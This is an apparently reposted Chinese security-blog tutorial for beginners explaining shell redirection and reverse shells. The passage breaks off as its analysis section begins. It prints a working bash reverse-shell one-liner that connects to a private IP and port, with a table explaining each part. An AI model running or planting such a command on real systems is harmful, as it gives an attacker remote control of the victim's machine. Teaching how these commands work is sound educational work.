安全路透社
当前位置:安全路透社 > 网络转载 > 正文

浅析重定向与反弹Shell命令

0×01    简介

反弹shell在漏洞证明和利用的过程中都是一个直接有力的手段。由于安全工作或者学习的需要,我们或多或少都会接触到各种反弹shell的命令,于是就有了这个能稍微帮助初学者理解的文档。

下面这个场景十分常见,攻击者在机器上监听相应端口,在受害者机器执行反弹shell命令,然后get shell。

israbye FreeBuf.COM

0×02    速食

那么这个反弹shell命令到底是什么意思呢

bash -i >&/dev/tcp/192.168.190.138/6666 0>&1

 对于速食主义者,后面的内容可以选择忽略

命令 解释
bash -i 产生一个交互式bash
>& /dev/tcp/ip/port 建立TCP连接,并将标准输出和错误重定向到TCP连接
0>&1 从TCP连接获取输入

0×03    分析

其实这里就涉及到重定向的知识

接下来我们分解一下命令 

赞 (0)
分享到:更多 ()

评论 0

评论前必须登录!

登陆 注册